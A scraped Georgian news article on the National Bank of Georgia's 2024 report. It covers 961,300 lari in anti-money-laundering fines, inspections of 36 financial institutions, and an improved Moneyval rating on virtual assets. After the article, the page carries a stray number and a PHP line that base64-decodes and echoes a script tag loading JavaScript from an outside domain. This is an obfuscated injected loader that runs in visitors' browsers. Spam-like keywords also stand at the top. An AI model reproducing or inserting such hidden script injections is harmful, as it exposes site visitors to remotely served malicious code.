gorgia
ავერსი jaluzi

საქართველოს ეროვნულმა ბანკმა საფინანსო სექტორში ფულის გათეთრებისა და ტერორიზმის დაფინანსების კანონმდებლობის დარღვევასთან დაკავშირებით გატარებული საზედამხედველო ღონისძიებების შედეგად გასულ წელს 961 300 ლარის ჯარიმა გამოწერა. ამის შესახებ აღნიშნულია სებ-ის 2024 წლის ანგარიშში.

ანგარიშის მიხედვით, ფულის გათეთრებისა და ტერორიზმის დაფინანსების აღკვეთის ხელშეწყობის შესახებ საქართველოს კანონმდებლობასთან შესაბამისობის დადგენის მიზნით, 2024 წლის განმავლობაში, საფინანსო სექტორის 36 წარმომადგენელი შემოწმდა.

შემოწმებებისას გამოვლენილი ნაკლოვანებების გამოსწორების უზრუნველსაყოფად, საქართველოს ეროვნული ბანკის ფულის გათეთრების ინსპექტირებისა და ზედამხედველობის დეპარტამენტმა, 2024 წელს, ზედამხედველობას დაქვემდებარებული 6 სუბიექტის დისტანციური ტიპის ე.წ. follow-up შემოწმება განახორციელა.

მნიშვნელოვანია აღინიშნოს, რომ 2024 წელს განსაკუთრებული ყურადღება დაეთმო საერთაშორისო სანქციებთან შესაბამისობისა და ფულადი გზავნილების სისტემით შესრულებული ტრანზაქციების შესწავლას. ამ მიზნით, კომერციულ ბანკებში შესწავლილ იქნა საერთაშორისო სანქციების რეჟიმებთან (დაკავშირებული რუსეთის ფედერაციასთან, ბელარუსთან, ირანის ისლამურ რესპუბლიკასთან) შესაბამისობის პროცესის ეფექტურობა.

2024 წელს, ფულის გათეთრებისა და ტერორიზმის დაფინანსების აღკვეთის ხელშეწყობის შესახებ საქართველოს კანონმდებლობის დარღვევისათვის დაკისრებული ფულადი ჯარიმის ოდენობამ ჯამურად 961 300 ლარი შეადგინა“, - აღნიშნულია ანგარიშში.

ამასთან, ანგარიშის მიხედვით, ადგილზე ინსპექტირების შედეგად დაკისრებული ფულადი ჯარიმების გარდა, 2024 წლის განმავლობაში, საფინანსო სექტორის წარმომადგენლების მიმართ აქტიურად გამოიყენებოდა მაკორექტირებელი ღონისძიებები. იდენტიფიცირებული სისუსტეების დაუყოვნებლივი აღმოფხვრისა და საფინანსო სექტორის წარმომადგენლების შესაბამისობის დონის ამაღლების მიზნით, ადგილზე ინსპექტირების შედეგების გათვალისწინებით, 2024 წელს, არაერთი რეკომენდაცია გაიცა.

ანგარიშის მიხედვით, რეკომენდაციების დიდი ნაწილი მიკროსაფინანსო ორგანიზაციებისთვის გაიცა, ჯამში 64 რეკომენდაცია.

„მნიშვნელოვანია აღინიშნოს, რომ 2024 წელს Moneyval-მა ვირტუალური აქტივისა და ვირტუალური აქტივის მომსახურების პროვაიდერების მიმართ ფულის გათეთრებისა და ტერორიზმის დაფინანსების აღკვეთის ხელშეწყობის მიზნით გატარებული ღონისძიებები დადებითად შეაფასა და მე-15 რეკომენდაციასთან საქართველოს ტექნიკური შესაბამისობის რეიტინგი გააუმჯობესა - ნაწილობრივ შესაბამისიდან (Partially Compliant) მნიშვნელოვნად შესაბამისად (Largely Compliant), რაც ეროვნული ბანკის მიერ გატარებული მთელი რიგი საზედამხედველო ღონისძიებების შედეგიცაა“, - აღნიშნულია ეროვნული ბანკის წლიურ ანგარიშში.

96
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");